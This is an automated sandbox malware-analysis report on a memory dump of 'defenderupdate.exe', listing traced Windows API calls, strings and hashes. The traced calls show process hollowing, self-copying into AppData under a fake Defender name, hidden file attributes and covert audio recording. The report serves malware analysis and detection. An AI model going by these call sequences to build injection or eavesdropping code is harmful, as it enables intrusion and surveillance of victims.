                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                • String ID:
                                                                                                • API String ID: 1815803762-0
                                                                                                • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                                                                • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID: GetLocaleInfoEx
                                                                                                • API String ID: 2299586839-2904428671
                                                                                                • Opcode ID: f5e2153e4984e43413bf11c07bd0b6bdf0abc05710bcbde66c151b87e472c2d2
                                                                                                • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                                                                • Opcode Fuzzy Hash: f5e2153e4984e43413bf11c07bd0b6bdf0abc05710bcbde66c151b87e472c2d2
                                                                                                • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                                                                APIs
                                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                • String ID:
                                                                                                • API String ID: 1663032902-0
                                                                                                • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                                                                • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                                                                APIs
                                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 2692324296-0
                                                                                                • Opcode ID: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                                • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                                                                • Opcode Fuzzy Hash: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                                • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                                                                APIs
                                                                                                • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: NameUser
                                                                                                • String ID:
                                                                                                • API String ID: 2645101109-0
                                                                                                • Opcode ID: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                                                                • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                • Opcode Fuzzy Hash: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                                                                • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                                                APIs
                                                                                                  • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(?,?,0044225B,00000000,0046DAC0,0000000C,00442216,?,?,?,00448739,?,?,00446F74,00000001,00000364), ref: 00444ADB
                                                                                                • EnumSystemLocalesW.KERNEL32(Function_00047068,00000001,0046DC48,0000000C), ref: 004470E6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                • String ID:
                                                                                                • API String ID: 1272433827-0
                                                                                                • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                                                                • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                                                                APIs
                                                                                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID:
                                                                                                • API String ID: 2299586839-0
                                                                                                • Opcode ID: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                                                                • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                                • Opcode Fuzzy Hash: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                                                                • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: recv
                                                                                                • String ID:
                                                                                                • API String ID: 1507349165-0
                                                                                                • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                                                • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: HeapProcess
                                                                                                • String ID:
                                                                                                • API String ID: 54951025-0
                                                                                                • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                                                                • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                                • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                                • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                                • GetLastError.KERNEL32 ref: 004175C7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                • API String ID: 4188446516-3035715614
                                                                                                • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                                                                • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                                                                                                APIs
                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                                                                  • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                                                                  • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                                • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                  • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                                • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                  • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
                                                                                                  • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5FF
                                                                                                  • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B60C
                                                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                  • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                • API String ID: 4250697656-2665858469
                                                                                                • Opcode ID: eb8ff656f144838187034c17abf61e056b931f5bb5ec87d5f57ca59327fe8020
                                                                                                • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                                                                • Opcode Fuzzy Hash: eb8ff656f144838187034c17abf61e056b931f5bb5ec87d5f57ca59327fe8020
                                                                                                • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                                APIs
                                                                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                                                                • SetEvent.KERNEL32 ref: 0041A38A
                                                                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                                                                • CloseHandle.KERNEL32 ref: 0041A3AB
                                                                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                                • API String ID: 738084811-1408154895
                                                                                                • Opcode ID: c362ced5fa98a12e984468584ff4096b6ed47b7628e845a56c9a339ad7c4d382
                                                                                                • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                                                                • Opcode Fuzzy Hash: c362ced5fa98a12e984468584ff4096b6ed47b7628e845a56c9a339ad7c4d382
                                                                                                • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                                • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                                • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                                • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Write$Create
                                                                                                • String ID: RIFF$WAVE$data$fmt
                                                                                                • API String ID: 1602526932-4212202414
                                                                                                • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                                • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\AppData\Roaming\defenderupdate.exe,00000001,004068B2,C:\Users\user\AppData\Roaming\defenderupdate.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProc
                                                                                                • String ID: C:\Users\user\AppData\Roaming\defenderupdate.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                • API String ID: 1646373207-3488278662
                                                                                                • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                                • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                                APIs
                                                                                                • _wcslen.LIBCMT ref: 0040BC75
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                                • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\defenderupdate.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                                                • _wcslen.LIBCMT ref: 0040BD54
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                                • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\defenderupdate.exe,00000000,00000000), ref: 0040BDF2
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                                • _wcslen.LIBCMT ref: 0040BE34
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                                • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                • String ID: 6$C:\Users\user\AppData\Roaming\defenderupdate.exe$del$open$BG$BG
                                                                                                • API String ID: 1579085052-3599359158
                                                                                                • Opcode ID: 8a4e8abcb5692669c638f214cb972068405fdb8eb26e88a62148626bb00c57e2
                                                                                                • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                                                                • Opcode Fuzzy Hash: 8a4e8abcb5692669c638f214cb972068405fdb8eb26e88a62148626bb00c57e2
                                                                                                • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                                                                • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                                                                • lstrlenW.KERNEL32(?), ref: 0041B207
                                                                                                • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                                                                • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                                                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                                                                • _wcslen.LIBCMT ref: 0041B2DB
                                                                                                • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                                                                • GetLastError.KERNEL32 ref: 0041B313
                                                                                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                                                                • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                                                                • GetLastError.KERNEL32 ref: 0041B370
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                • String ID: ?
                                                                                                • API String ID: 3941738427-1684325040
